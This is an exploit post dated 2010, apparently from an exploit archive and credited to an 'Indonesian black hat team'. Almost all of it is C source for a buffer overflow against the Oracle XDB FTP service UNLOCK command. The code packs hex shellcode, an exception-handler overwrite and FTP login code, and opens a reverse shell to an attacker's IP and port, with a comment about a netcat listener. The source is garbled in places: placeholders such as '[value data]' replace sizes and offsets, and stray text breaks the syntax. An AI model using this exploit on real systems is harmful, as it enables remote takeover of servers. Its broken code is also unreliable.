
oraclexdb-overflow.txt

Posted on 18 March 2010

[+] vulnerabilities network level/stack based buffer overflow [+] special network layer attack [+] implemented over http/XML-db/ftp==>windows XDB [+] connecting:8080 [=] operation: win 32-->xdb overflow [+] author mc2_s3lector [+] yogyacarderlink.web.id/KeDai Computerworks.com exploit win32 #include <stdio.h> #include <windows.h> #include <winsock.h> int GainControlOfOracle(char *, char *); int StartWinsock(void); int SetUpExploit(char *,int); struct sockaddr_in s_sa; struct hostent *he; unsigned int addr; char host[value data]=""; //register acces\ unsigned char exploit[value data]= "x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF" "xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50" "x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C" "x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89" "x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13" "x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC" "x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C" "x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89" "x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83" "xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89" "x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33" "xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A" "x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66" "x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45" "xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0" "x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84" "x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57" "x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50" "x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8" "x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD" "x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03" "x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48" "x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83" "xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41" "x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03" "x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3" "x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C" 
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8" "x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B" "x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B" "xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF" "xFFxFFxFFxFF"; char exploit_code[value data]= "UNLOCK / put character" "put character" "put character" "put character" "put character" --------->char or nummeric-----or combine chart&nummeric "5eeefffggghhh"; char exception_handler[value dataX]="x79x9Bxf7x77"; char short_jump[value dataX]="xEBx06x90x90"; int main(int argc, char *argv[]) { if(argc != 6) { printf(" Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); printf(" Spawns a reverse shell to specified port"); printf(" Usage: %s host userid password ipaddress port",argv[0]); printf(" 6th maret 2010 "); return 0; } strncpy(host,argv[1],250); if(StartWinsock()==0) return printf("Error starting Winsock. "); SetUpExploit(argv[4],atoi(argv[5])); strcat(exploit_code,short_jump); strcat(exploit_code,exception_handler); strcat(exploit_code,exploit); strcat(exploit_code," "); GainControlOfOracle(argv[2],argv[3]); return 0; } int SetUpExploit(char *myip, int myport)--->protocol { unsigned int ip=0; unsigned short prt=0; char *ipt=""; char *prtt=""; ip = inet_addr(myip); ipt = (char*)&ip; exploit[value data]=ipt[0]; exploit[value data]=ipt[1]; exploit[value data]=ipt[2]; exploit[value data]=ipt[3]; // set the TCP port to connect on // netcat should be listening on this port // e.g. 
nc -l -p 80 prt = htons((unsigned short)myport); prt = prt ^ 0xFFFF; prtt = (char *) &prt; exploit[value data]=prtt[0]; exploit[value data]=prtt[1]; return 0; } int StartWinsock() { int err=0; WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD( 2, 0 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) return 0; if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) { WSACleanup( ); return 0; } if (isalpha(host[0])) { he = gethostbyname(host); s_sa.sin_addr.s_addr=INADDR_ANY; s_sa.sin_family=AF_INET; memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); } else { addr = inet_addr(host); s_sa.sin_addr.s_addr=INADDR_ANY; s_sa.sin_family=AF_INET; memcpy(&s_sa.sin_addr,&addr,4); he = (struct hostent *)1; } if (he == NULL) { return 0; } return 1; } int GainControlOfOracle(char *user, char *pass) { char usercmd[value dataXX]="user "; char passcmd[value dataXX]="pass "; char resp[1600]=""; int snd=0,rcv=0; struct sockaddr_in r_addr; SOCKET sock; strncat(usercmd,user,230); strcat(usercmd," "); strncat(passcmd,pass,230); strcat(passcmd," "); sock=socket(AF_INET,SOCK_STREAM,0); if (sock==INVALID_SOCKET) return printf(" sock error"); r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY; r_addr.sin_port=htons((unsigned short)0); s_sa.sin_port=htons((unsigned short)2100); if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error"); rcv = recv(sock,resp,1500,0); printf("%s",resp); ZeroMemory(resp,1600); snd=send(sock, usercmd , strlen(usercmd) , 0); rcv = recv(sock,resp,1500,0); printf("%s",resp); ZeroMemory(resp,1600); snd=send(sock, passcmd , strlen(passcmd) , 0); rcv = recv(sock,resp,1500,0); printf("%s",resp); if(resp[0]=='5') { closesocket(sock); return printf("Failed to log in using user %s and password %s. 
",user,pass); } ZeroMemory(resp,1600); snd=send(sock, exploit_code, strlen(exploit_code) , 0); Sleep(2000); closesocket(sock); return 0; } big thank to; ================================================================================ indonesian black hat team(www.yogyacarderlink.web.id) KeDaiComputerworks.com Jasakom(jasakom.com) indonesianhacker.org Indesign COmputer Care (INDESIGN) Indonesian hacker(indonesianhacker.org) one-day(the-codec),n3r0,elpaciano ================================================================================

